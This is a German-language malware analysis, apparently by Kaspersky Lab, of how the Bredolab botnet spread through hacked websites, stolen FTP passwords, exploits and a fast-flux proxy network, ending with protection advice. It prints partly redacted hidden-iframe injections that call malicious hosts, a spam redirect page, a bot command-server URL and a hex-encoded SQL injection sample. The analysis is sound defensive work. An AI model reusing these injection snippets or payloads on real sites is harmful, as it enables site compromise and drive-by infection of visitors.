Bredolab-Botnetz – Ende der Geschichte?

Einleitung

Am 25. Oktober 2010 teilte die für den Kampf gegen Cyberkriminalität zuständige Abteilung der niederländischen Polizei mit, dass 143 Kontrollserver des Botnetzes Bredolab unschädlich gemacht wurden. Am darauffolgenden Tag wurde am internationalen Flughafen Jerewan einer der Betreiber des stillgelegten Zombie-Netzes festgenommen. Das war möglicherweise das Aus für das Bredolab-Botnetz, doch die bei seinem Aufbau verwendete Technologie könnte leider auch bei der Entwicklung anderer Botnetze zum Einsatz kommen.

Besonderheiten beim Aufbau des Bredolab-Botnetzes

Schadprogramme der Familie Backdoor.Win32.Bredolab sind mindestens seit Mitte 2008 bekannt. Die Hauptaufgabe von Bredolab besteht im Download anderer schädlicher Programme auf den befallenen Computer. Das Steuerungssystem für die Downloads, das den Loader (Backdoor.Win32.Bredolab) enthält, wurde ebenso wie die Administrationsoberfläche in Hackerforen zum Verkauf angeboten. Genau diese Software bildet die Grundlage für das Bredolab-Botnetz, das Mitte 2009 in Erscheinung trat. Angaben der niederländischen Polizei zufolge waren etwa 30 Millionen Computer von Anwendern aus verschiedenen Ländern der Welt daran angeschlossen.

Das auffälligste am Botnetz ist sein Aufbau. Für die Verbreitung des schädlichen Bot-Programms dienten gehackte legitime Webseiten, die Besucher auf schädliche Ressourcen umleiteten, von denen aus ihre Computer mit Backdoor.Win32.Bredolab infiziert wurden. Das geschah vollautomatisch.

Gehackte Webseiten

Als das Botnetz noch ganz neu war, wurde auf den gehackten Webseiten der versteckte HTML-Tag Iframe platziert, der einen Link auf eine schädliche Ressource enthielt. Ende 2009 wurde dieser Iframe durch getarnten JavaScript-Code ersetzt, den Skript-Downloader Trojan-Downloader.JS.Pegel. Bei dessen Ausführung verschlüsselte der Browser die HTML-Seite und fügte ihr den HTML-Tag Script mit einem Link auf eine schädliche Ressource hinzu. Die Aufgabe von Pegel bestand darin, auf den Computer des Opfers Exploits herunterzuladen, die ihrerseits Bredolab luden. Im Sommer 2010 arbeiteten die Kriminellen erneut mit Iframe.

Bemerkenswert ist, dass das Verbreitungsmuster von Bredolab dem des Gumblar-Botnetzes entsprach. Hinsichtlich der Tarnung ist auch Pegel dem Skript-Downloader Gumblar sehr ähnlich.

Die Bedrohung hatte globalen Charakter. Web-Ressourcen mit diesem Schadcode wurden in verschiedenen Ländern aufgedeckt.


Verteilung der mit Trojan-Downloader.JS.Pegel infizierten Web-Ressourcen nach Ländern
(Januar bis Oktober 2010)

In vielen Ländern waren die Rechner von Anwendern von einer Infizierung mit Bredolab bedroht.


Verteilung der Detektionen von Backdoor.Win32.Bredolab auf den Computern der Anwender
nach Ländern (Januar bis Oktober 2010)

In Internet-Foren tauchten massenhaft Meldungen über getarnten JavaScript-Code auf, der auf legitimen Webseiten eingeschleust worden war und der Anwender auf Ressourcen umleitete, die von Cyberkriminellen kontrolliert wurden.


Beispiel eines Foren-Beitrags

Anfang 2010 fanden sich in den Foren zahlreiche Beiträge in der Art des oben abgebildeten Beispiels. Damals bestand eines der wichtigsten Erkennungsmerkmale von Pegel in den Kommentaren /*GNU GPL*/, /*LGPL*/, /*CODE1*/ oder /*Exception*/, die am Anfang des schädlichen JavaScript-Codes standen. Der Code einer infizierten Seite sah in etwa folgendermaßen aus:


Beispiel einer mit Pegel infizierten legitimen Webseite

Im Folgenden verschwanden die Kommentare aus dem Skript-Code und die Tarnung wurde immer komplexer:


Beispiel einer infizierten Seite mit komplizierterer Tarnung des JavaScript-Codes

Besondere Aufmerksamkeit verdient das äußere Erscheinungsbild der schädlichen Links, die Pegel während der ersten Monate seines Erscheinens verwendete. Der Domain-Teil und der Pfad zum schädlichen Skript bestanden aus bekannten, aufeinander folgenden Domain-Namen, zum Beispiel:

    hxxp://twitpic-com.fastclick.com.shinobi-jp.bestb***site.ru:8080/google.com/google.com/novoteka.ru/vagos.es/radikal.ru/
    hxxp://google-com-sa.scribd.com.google-hr.bestb***site.ru:8080/bu520.com/bu520.com/google.com/56.com/ups.com/
    hxxp://staples-com.toysrus.com.ngoisao-net.cars***net.ru:8080/google.com/google.com/livedoor.biz/atwiki.jp/torrents.ru/

    Die Domains der zweiten Ebene bestanden aus zwei bis drei englischen Wörtern, die normalerweise keinen gemeinsamen Kontext haben. Die Verwendung schädlicher Links, die Adressen populärer Web-Ressourcen ähneln, ist eine bei Cyberkriminellen beliebte Methode des Social Engineering, um bei den Anwendern möglichst keinen Verdacht zu erregen.

    Etwas später bestanden die Links aus Domains der zweiten Ebene:

    hxxp://help***ecare.at:8080/vkontakte-ru/google.com/chinahr.com.php
    hxxp://jui***ile.ru:8080/sify-com/google.com/last.fm.php
    hxxp://pass***tblues.ru:8080/google.com/kijiji.ca/pornhub.com.php
    hxxp://best***kstar.info:8080/google.com/travian.com/youjizz.com.php

    Noch später verschwanden die langen Pfade aus den Links und der Pfad lautete nun index.php.

    Fast-Flux-Netz

    Die in den schädlichen Links enthaltenen Domains waren in verschiedenen Domain-Zonen registriert: ru, info, at, com. Jede Domain verfügte über fünf IP-Adressen, die ihrerseits wiederum mit einer Vielzahl von schädlichen Domains in Verbindung standen.


    Übereinstimmung der IP-Adressen mit den schädlichen Domains

    Die Anzahl der IP-Adressen schwankte zwischen 20 und 40. Im Laufe der Zeit wurden einige Adressen aussortiert und neue kamen hinzu. Hin und wieder wurden IP-Adressen geändert, die mit einer bestimmten Domain verbunden waren.


    A-Records zu unterschiedlichen Zeiten

    Es hatte den Anschein, als gehörten alle verwendeten IP-Adressen zu ausgesuchten Servern (oder virtuell ausgesuchten Servern) verschiedener Hosting-Provider. Zudem förderte eine weitere Analyse zutage, dass über Port 80 vieler solcher Server auch legale Webseiten aufrufbar waren, die rein gar nichts mit kriminellen Machenschaften zu tun hatten. Das wiederum gab Anlass zu der Überlegung, dass die Server, auf denen sich die schädlichen Domains befanden, auf irgendeine Weise gehackt sein mussten. Ein Teil der von den Cyberkriminellen registrierten Domains wurde für DNS-Dienste verwendet, die auf genau denselben gehackten Servern liefen, wobei sich sowohl die NS-Records als auch die A-Records periodisch änderten.


    NS-Records zu unterschiedlichen Zeiten

    Das oben Beschriebene erinnert an die Funktion von Fast-Flux-Netzen, genauer gesagt an Double-Flux-Netze, bei denen sich auch die Adresse der DNS-Server ändert.

    Noch eine weitere interessante Entdeckung: In den allermeisten Fällen verwiesen alle schädlichen Links auf Port 8080 und in den HTTP-Headern lautete die Serverantwort im Feld „Server“ nginx. Nginx ist ein überaus populärer HTTP-Server, der häufig als Reverse-Proxy genutzt wird. Anwender, die dem schädlichen Link folgten, landeten auf den Proxy-Servern, welche die Anfrage an ein Steuerungszentrum des Botnetzes weiterleiteten.

    Ein aus Proxy-Servern bestehendes Fast-Flux-Netz trägt dazu bei, das Kontrollzentrum eines Botnetzes vor Entdeckung durch IT-Sicherheitsexperten zu schützen. Alle Anfragen nach dem Download von Schadcode, die vom schädlichen JavaScript-Code und den Exploits ausgingen, sowie die Anfragen von Bredolab an das Steuerungszentrum liefen über die Proxy-Server dieses Fast-Flux-Netzes.

    Die meisten Domains des Fast-Flux-Netzes wurden von den Cyberkriminellen selbst registriert. Im Sommer 2010 tauchten allerdings Domains auf, die sich als Subdomains der dritten Ebene herausstellten:

    kollinsoy.skyef***on.com
    aospfpgy.dogpl***tation.com
    oployau.fancou***logger.com
    hosotpoyu.credi***brary.com

    Während der Link mit Domains der dritten Ebene auf die Proxy-Server des Botnetzes Bredolab verwies, enthielten die Domains der zweiten Ebene Links zu legitimen Webseiten. Die IP-Adressen der dritten und zweiten Ebene unterschieden sich voneinander. So erhielten die Kriminellen durch das Hacken von Anwender-Accounts oder auf irgendeine andere Weise die Möglichkeit, die DNS-Einstellungen dieser Webseiten zu steuern.

    Infizierung der Anwendercomputer

    Nachdem der Browser des Anwenders mit Hilfe von Pegel oder Iframe auf eine schädliche Webseite umgeleitet worden war, wurde von dort aus der JavaScript-Code geladen:


    Nach der Entschlüsselung sieht der Code folgendermaßen aus:


    Anschließend schleuste der JavaScript-Code den folgenden HTML-Code in die Seite ein:

    <div id=“DIV“>
    <iframe src=“http://ma***gh.com:8080/index.php?Mvplkcm435j=11&pid=1″ width=“1″
    frameborder=“0″ height=“1″></iframe>
    </div>

    Über den im Code enthaltenen Link wurde ein weiterer JavaScript-Code heruntergeladen.


    Dieser Code-Abschnitt sieht nach der Entschlüsselung so aus:


    Dieser Code leitete die Anfrage des Anwenders im Browser auf Exploits um.

    Die Exploits nutzen die folgenden Sicherheitslücken in Adobe Acrobat aus: Die Funktionen util.printf (CVE-2008-2992), Collab.collectEmailInfo (CVE-2008-0655), Collab.getIcon (CVE-2009-0927), media.newPlayer (CVE-2009-4324), die virtuelle Java-Maschine (CVE-2010-0886) und die MDAC RDS.Dataspace ActiveX-Komponente (CVE-2006-0003).


    Ein Teil des entschlüsselten JavaScript-Codes zum PDF-Exploit

    Das Java-Exploit wurde in zwei Etappen geladen: Zuerst wurde die Seite Applet1.html heruntergeladen, die den Tag <applet> mit den Namen der jar-Dateien enthielt. Daraufhin wurde das Exploit selbst geladen.


    HTML-Seite Applet1.html, die das Java-lädt

    Die Exploits luden das Schadprogramm Backdoor.Win32.Bredolab auf den betroffenen Computer und starteten es. Die Hauptaufgabe dieses Schädlings besteht im Download und Start anderer Malware.


    Etappen der Infizierung des Anwendercomputers

    Das Botnetz in Betrieb

    Hat sich der Bot erst einmal in einen Computer eingeschlichen, sendet er eine Anfrage folgendr Art an seine Steuerungszentrale, um weitere Schadprogramme herunterzuladen:

    http://ba***il.ru:8080/new/controller.php?action=bot&entity_list=&first=1&rnd=981633&id=1&guid=3676040431.

    Die Antwort der Botnetz-Steuerungszentrale enthält im Body die verschlüsselten ausführbaren Dateien. In der Regel sind drei bis vier Dateien aneinandergereiht.


    Antwort der Steuerungszentrale, die die verschlüsselte Nachricht enthält

    Im Header der Antwort ist das Feld Entity-Info enthalten, das aus einer Liste von Elementen besteht, die durch ein Semikolon getrennt sind. Jedes Element beschreibt eine ausführbare Datei, die sich im Body der Antwort befindet. Das Element ist durch Doppelpunkte in Zahlenfelder unterteilt. So enthält das zweite Feld jedes Elements beispielsweise die Größe der entsprechenden ausführbaren Datei. Auf diese Weise kann man erkennen, wo eine Datei aufhört und wo die nächste beginnt.

    Im Header der Antwort befindet sich im Feld Magic-Number der Schlüssel für die Dechiffrierung des Antwortkörpers. Er besteht aus Zahlen, die durch das Symbol „|“ voneinander abgegrenzt werden. Die erste Zahl ist ein langer Schlüssel, die zweite stellt den Verschlüsselungsalgorithmus dar. Dabei ist die Ziffer 1 ein gewöhnliches XOR und der restliche Teil des Feldes der Dechiffrierungsschlüssel. Hierbei muss unbedingt erwähnt werden, dass der schädliche JavaScript-Code, die Exploits sowie Bredolab und andere von Bredolab auf dem infizierten Computer installierten Schadprogramme von ein und denselben Domains heruntergeladen wurden, die zum Fast-Flux-Netz des Bredolab-Botnetzes gehören.

    Bredolab lud ein überaus breites Spektrum an Malware auf die Computer seiner Opfer:

    Trojan-Spy.Win32.Zbot
    Trojan-Spy.Win32.SpyEyes
    Trojan-Spy.Win32.BZub
    Backdoor.Win32.HareBot
    Backdoor.Win32.Blakken
    Backdoor.Win32.Shiz
    Trojan-Dropper.Win32.TDSS
    Trojan-Ransom.Win32.PinkBlocker
    Trojan.Win32.Jorik.Oficla

    Und diese Liste ist bei Weitem nicht vollständig.

    Einige dieser Schadprogramme geben in den Anfragen an ihre Steuerungszentren Parameter weiter, die die Identifikationsnummer des Partners benennen. Der von Bredolab geladene Schädling Backdoor.Win32.Shiz gibt zum Beispiel den Parameter seller=15 weiter, was bedeutet, dass er mit Hilfe von Bredolab installiert wurde. Die Meldung solcher Identifikationsnummern an die Kommandozentrale zeugt normalerweise davon, dass das Schadprogramm über Partnerprogramme verbreitet wird. Das und die Vielfalt der von Bredolab geladenen Software weist darauf hin, wie die Betreiber des Bredolab-Botnetzes ihre Anstrengungen beim Aufbau des Zombie-Netzwerks zu Geld gemacht haben. Sie verdienten an den Downloads, das heißt, sie haben Aufträge anderer Krimineller entgegengenommen, deren Malware zu verbreiten.

    Unter der geladenen Software verdient Trojan-PSW.Win32.Agent.qgg besondere Aufmerksamkeit. Einmal auf dem Computer des Anwenders installiert, versucht dieser Trojaner, die gespeicherten Passwörter folgender FTP-Clients zu finden:

    Filezilla 3
    Ftp Navigator
    BulletProof Ftp
    CuteFtp
    ALFTP
    Far 2
    Frigate 3
    Ftp Explorer
    FlashFXP
    FTPRush
    Firefox
    Auto FTP
    Total Command

    Findet der Trojaner die Passwörter, schickt er sie an den Server der Cyberkriminellen.

    Trojan-PSW.Win32.Agent.qgg ist deshalb so interessant, weil der Server, an den dieser Trojaner die gestohlenen Passwörter schickte, den Betreibern des Botnetzes Bredolab gehörte. Und mit Hilfe eben dieser gestohlenen Passwörter für FTP-Accounts konnten die Cyberkriminellen legale Webseiten mit dem Schadcode infizieren. Dieser geschlossene Kreislauf erwies sich als äußerst effektiv.

    Schädlicher Kreislauf

    Nach genauester Untersuchung ergab sich ein mehr oder minder vollständiges Bild über den Aufbau des Botnetzes.

    1. Beim Besuch einer mit Pegel/Iframe infizierten Webseite lädt der Browser des Anwenders von der schädlichen Ressource eine Seite, die den schädlichen JavaScript-Code enthält.
    2. Dieser Code initiiert die Infizierung des Computers mit dem Programm Bredolab, das weitere Malware inklusive eines Trojaners auf den Rechner lädt, der Passwörter zu FTP-Accounts stiehlt. All das läuft über einen der Reverse-Proxy-Server, die das wahre Steuerungszentrum des Botnetzes verschleiern.
    3. Nach einer gewissen Zeit erfolgt die Infizierung einer Webseite, deren Zugangsdaten gestohlen wurden. Unter Verwendung dieser Login-Daten und dem Passwort für den FTP-Account wird vom Server der Inhalt der Webseite heruntergeladen. Dabei wird nicht der gesamte Content geladen, sondern nur die Dateien, die mit index*, default* und main* beginnen sowie alle Dateien mit der Erweiterung *.js. Anschließend bauen die Cyberkriminellen ihren Schadcode in diese Dateien ein und laden sie wieder auf die Webseite hoch. Interessant ist, dass der Download sowie auch der darauffolgende Upload über eine Vielzahl von IP-Adressen stattfindet. Jede Datei kann über eine IP-Adresse heruntergeladen und von einer anderen hochgeladen werden.
    4. Besucht ein anderer Anwender die infizierte Webseite, wiederholt sich das beschriebene Schema.

    Offensichtlich handelte es sich bei den Rechnern, die an der Infizierung einer Webseite beteiligt waren, um Proxy-Server. Die Kriminellen verwendeten zwei Gruppen von Proxy-Servern: eine für die Infizierung der Computer der Anwender, die andere zur Infizierung der Webseite. Überschneidungen zwischen der ersten und zweiten Gruppe von Proxy-Servern konnte nicht festgestellt werden.


    Teil des FTP-Protokolls, das den Infizierungsprozess einer Webseite zeigt


    Funktionsschema des Bredolab-Botnetzes

    Dieses Verbreitungsschema wurde von den Cyberkriminellen verwendet, solange das Bredolab-Botnetz existierte.

    Traffic

    Das oben beschriebene Selbsterhaltungsschema des Botnetzes ist ohne Zweifel effektiv, allein schon durch die Automatisierung des Infizierungsprozesses für neue Computer. Allerdings hat es auch eine Schwachstelle. Das Schema beginnt in dem Moment zu funktionieren, in dem der Anwender von der infizierten legitimen Ressource auf die schädliche Domain aus dem Fast-Flux-Netz umgeleitet wird. Dabei ist jedoch die Zahl der Computer begrenzt, die mit Bredolab infiziert sind und gleichzeitig administrativen Zugriff auf irgendwelche Webseiten haben. Dementsprechend limitiert ist auch die Anzahl der Web-Ressourcen, welche die Kriminellen über gestohlene FTP-Accounts infizieren konnten. Webseiten mit hohen Besucherzahlen wurden recht schnell von der Malware gesäubert. Je größer das Publikum einer Webseite ist, desto größer ist auch die Wahrscheinlichkeit, dass irgendein Besucher bemerkt, dass etwas nicht in Ordnung ist und die Administratoren der Website benachrichtigt.

    Die Zahl der mit Hilfe dieses Schemas infizierten Computer war den Cyberkriminellen allerdings nicht hoch genug. Um die Effizienz der Attacken noch zu steigern, musste der Traffic hochgetrieben werden. Damit ist die Anzahl der Besucher gemeint, die auf die schädlichen Domains des Fast-Flux-Netzes umgeleitet werden. Um das zu erreichen, probierten die Betrüger verschiedenes aus.

    Mit getarntem JavaScript-Code infizierte legitime Webseiten wurden seit Dezember 2009 dazu verwendet, Nutzer auf schädliche Ressourcen umzuleiten. Der Schadcode lauerte unter Umständen selbst auf sehr populären Webseiten. Die vom Anwender im Browser geöffnete Webseite konnte in Code-Form zum Beispiel folgendermaßen aussehen.


    Beispielcode einer infizierten Web-Seite

    Nach der Ausführung des verschlüsselten Codes durch den Browser wurde der Tag <script> in die Webseite integriert. Dieser enthielt den Schädling Trojan-Downloader.JS.Pegel, welcher den Anwender wiederum auf die schädliche Ressource umleitete.

    Einen Link auf den schädlichen Content erhielten die User unter anderem in Spam-Mails „frei Haus“. Im Juni 2010 belegte die Modifikation Trojan-Downloader.JS.Pegel.g den ersten Platz im Rating der im E-Mail-Traffic am weitesten verbreiteten schädlichen Anhänge.


    Top 20 der im E-Mail-Traffic am weitesten verbreiteten schädlichen Dateien im Juni 2010

    Einige der schädlichen Spam-Attacken waren durchaus raffiniert. Ebenfalls im Juni 2010 wurden die User von einer Spam-Welle überschwemmt, wobei gefälschte Mitteilungen im Namen so bekannter Portale wie Twitter, Youtube, Amazon, Facebook und Skype verschickt wurden. Die Mails enthielten den schädlichen Pegel-Code im HTML-Anhang oder Links auf infizierte Webseiten.


    Beispiel einer Spam-Mail mit Links auf eine schädliche Webseite

    Klickten die Anwender auf einen solchen Link, lud die infizierte Webseite eine HTML-Seite in den Browser, die folgenden Code enthielt:

    PLEASE WAITING 4 SECOND…
    <meta http-equiv=“refresh“ content=“4;url=http://spr***team.com“>
    </head><body>
    <iframe src=“http://yu***eyes.ru:8080/index.php?pid=10″ style=“visibility: hidden;“
    height=“1″ width=“1″></iframe>
    </body></html>

    Der Tag meta-refresh leitete den Nutzer nach einigen Sekunden auf eine Seite des Internetauftritts der Canadian Pharmacy weiter, die mit Viagra und anderen Medikamenten handelt.


    Webseite der Canadian Pharmacy

    Gleichzeitig wurde der Browser über den im Tag Iframe enthaltenen Link auf einen der zum Fast-Flux-Netz gehörenden Proxy-Server umgeleitet, um den Computer des Anwenders mit Bredolab zu infizieren.

    Im August wurde eine weitere Traffic-Quelle aufgedeckt. Der Spam-Bot Asprox, der SQL-Code in Webseiten einschleusen kann, die in ASP geschrieben sind, begann legitime Webseiten über den Tag Iframe zu infizieren, der einen Link auf nem****n.ru/tds/go.php?sid=1 enthielt.

    GET /page.asp?id=425;
    declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c4172452040542076615
    26368615228323535292c406320…5205461424c655f435552736f7220%20as%20varch
    ar(4000));exec(@s);–

    Beispiel einer von dem Asprox-Bot verwendeten SQL-Einschleusung

    Betrat der Anwender die infizierte Webseite, öffnete sein Browser einen Link, der sich im Tag Iframe befand. Unter diesem Link war das TDS (Traffic Distribution System) untergebracht, das den Browser auf die schädlichen Domains umleitete. Diese gehörten zum Fast-Flux-Netz, das die Betreiber des Bredolab-Botnetzes unterhielten, um so die Computer der Anwender mit Bredolab zu infizieren. Pro Tag wurden so etwa 10 000 Anwender umgeleitet.

    Schließlich wurde im September die neue Methode bekannt, mit der Nutzer auf Domains des Fast-Flux-Netzes umgeleitet wurden, die zum Bredolab-Botnetz gehören. Gehackt wurden beliebte Webseiten, welche die Banner-Engine OpenX zum Anzeigen von Werbung verwenden. Dabei nutzten die Cyberkriminellen eine Sicherheitslücke in der Komponente Open Flash Chart 2 aus, die es ihnen ermöglichte, beliebige Dateien auf den Server zu laden. Die Folge davon war, dass auf den legitimen Webseiten Banner ausgetauscht wurden, darunter auf thepiratebay.org, tucows.com, afterdawn.com, esarcasm.com und tutu.ru. Bei den Bannern handelte es sich um Flash-Dateien mit ActionScript-Code, der Anwender auf schädliche Ressourcen umleitete. Gleichzeitig wurde eine DDoS-Attacke auf die offizielle Website des Projekts OpenX organisiert, so dass die Nutzer einige Tage keine Möglichkeit hatten, sich Updates der Engine herunterzuladen und so die Sicherheitslücke zu schließen.


    Ausschnitt einer schädlichen SWF-Datei


    Teil des ActionScript-Codes, der in die HTTP-Seite den Tag script mit Link auf eine
    schädliche Site integriert

    Nach einem Höhenflug im Juni, der mit der Verbreitung von Spam-Mails mit Links auf die schädlichen Ressourcen des Botnetzes zusammenhing, nahm die Aktivität von Pegel ab. Trotzdem könnte diese Bedrohung erneut zutage treten, wenn nicht das gesamte Bredolab-Botnetz am Ende ist.

    Fazit

    Die Betreiber des Bredolab-Botnetzes haben ein 30 Millionen Rechner umfassendes Zombie-Netzwerk aufgebaut, das über einen längeren Zeitraum funktioniert hat. Um das Botnetz in funktionsfähigem Zustand zu erhalten, haben die Cyberkriminellen das Steuerungszentrum des Botnetzes überaus klug und effektiv versteckt, indem sie die Technik von Fast-Flux-Netzen nutzten. Ein solches Schema gewährleistet nicht nur eine hohe Fehlertoleranz des Botnetz-Steuerungszentrums, sondern es erleichtert auch die Steuerung des schädlichen Contents: Anstatt die schädlichen Webseiten auf einer Vielzahl von Knoten zu verwalten, reicht es aus, eine solche Webseite auf dem Kommandozentrum zu platzieren und Redirects zu ihr einzurichten.

    Angesichts seiner Komplexität ist es unwahrscheinlich, dass das Bredolab-Botnetz von nur einer Person kontrolliert wurde. Allerdings ist bisher nur von der Verhaftung eines Kriminellen die Rede, der mit diesem Botnetz in Verbindung steht. Es kann also sein, dass die übrigen Mitglieder der kriminellen Gruppe ihre Geschäfte fortführen werden, da das von ihnen erdachte und in die Tat umgesetzte Schema äußerst effizient ist. Die zum Aufbau und zur Aufrechterhaltung der Funktionsfähigkeit des Botnetzes eingesetzten Technologien – Tarnung von JavaScript-Code, der Exploits hochlädt, ein geschlossener Aufbau-Zyklus des Zombie-Netzes, die Schaffung einer Netz-Infrastruktur, die Fast-Flux einsetzt und vieles andere – könnten auch andere Cyberkriminellen in ihr Repertoire übernehmen.

    Eine der wichtigsten Besonderheiten des Bredolab-Botnetzes ist das an einen geschlossenen Kreislauf erinnernde Aufbauschema des Zombie-Netzes, in dem befallene Computer von Anwendern Webseiten infizieren, über die wiederum neue Rechner befallen werden. Darüber hinaus wurde ständig nach neuen Wegen gesucht, die Benutzer auf schädliche Domains umzuleiten. Die Hauptgefahrenquelle innerhalb eines solchen Schemas sind infizierte Webseiten, die Malware auf den Computer des Anwenders laden, sobald er diese besucht. Die Informationen von den infizierten Computern können ihrerseits wieder zur Infizierung von Webseiten genutzt werden.

    Um Bedrohungen dieser Art nicht zum Opfer zu fallen, sollten Sie unbedingt die folgenden Empfehlungen zum Schutz von Computern und Webseiten beherzigen.

    Schutz von Computern

    • Installieren Sie unbedingt rechtzeitig die zur Verfügung stehenden Updates sowohl für das Betriebssystem als auch für Software von Drittanbietern. Die meisten Exploits und Würmer nutzen Sicherheitslücken in der Software aus, die in den aktualisierten Versionen der entsprechenden Produkte bereits geschlossen wurden.
    • Selbstverständlich muss eine Anti-Malware-Lösung auf dem Rechner installiert sein, wobei deren Datenbanken immer auf dem neusten Stand sein müssen. Zwar ist auch ein Antiviren-Programm kein Allheilmittel, aber es verringert das Risiko einer Infizierung Ihres Computers doch immens.
    • Natürlich sollte man nie auf Links klicken, die sich in Spam-Mails, in Nachrichten von unbekannten Personen innerhalb sozialer Netzwerke und Instant-Messaging-Programmen befinden. Das ist – wie es heißt – selbstverständlich.

    Schutz von Webseiten

    • Zur Infizierung einer Webseite kann eine Sicherheitslücke in ihrem Code ausgenutzt werden. Um den Cyberkriminellen keine Möglichkeit zu geben, Sicherheitslücken auszunutzen, sollten Sie auf die Veröffentlichung von Software-Updates achten und die Software der Seite rechtzeitig aktualisieren.
    • Denken Sie daran, dass es Services und Systeme zum Scannen von Webseiten gibt, die schädlichen Code und die unautorisierte Änderung ihres Contents aufdecken.
    • Im Sinne der Sicherheit sollten Sie die automatische Speicherung der FTP-Passwörter in den FTP-Clients besser deaktivieren. Denken Sie daran, dass viele Programme, die Passwörter von FTP-Accounts stehlen – insbesondere unter Verwendung von Bredolab Trojan-PSW.Win32.Agent.qgg -, auf den infizierten Computern nach gespeicherten Passwörtern suchen.
    • Auch regelmäßige Backups der Seite (Datenbanken, Dateien, in denen wichtige Daten gespeichert sein können) könnten sich als nützlich erweisen, sollten sich die Daten infolge einer Infizierung als unbrauchbar erweisen.
    • Wird eine Webseite dennoch infiziert, ist es nicht unbedingt ausreichend, den schädlichen Code einfach von der Seite zu löschen. Wurden beispielsweise FTP-Passwörter gestohlen, so könnte die Seite nach kurzer Zeit wieder infiziert sein. Gehen Sie also folgendermaßen vor, um das Problem tatsächlich zu lösen:
      1. Überprüfen Sie, ob Updates für die auf der Webseite installierte Software verfügbar sind und laden Sie diese hoch, um eine Infizierung der Seite über eine Sicherheitslücke auszuschließen.
      2. Führen Sie unter Verwendung eines Anti-Malware-Produkts mit aktuellen Antiviren-Datenbanken einen vollständigen Scan der Computer durch, die Zugriff auf die FTP-Site haben.
      3. Ändern Sie das Passwort für den FTP-Account.
      4. Säubern Sie die Seite von schädlichem Code.

    Befolgen Sie die aufgeführten Empfehlungen, reduziert sich das Risiko entscheidend, dass Ihr Computer Teil eines Botnetzes wird. Denken Sie immer daran: Vorbeugen ist besser – und einfacher – als heilen.

    Der Artikel und Zitate daraus dürfen unter Nennung des Unternehmens Kaspersky Lab sowie des Autors frei veröffentlicht werden.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.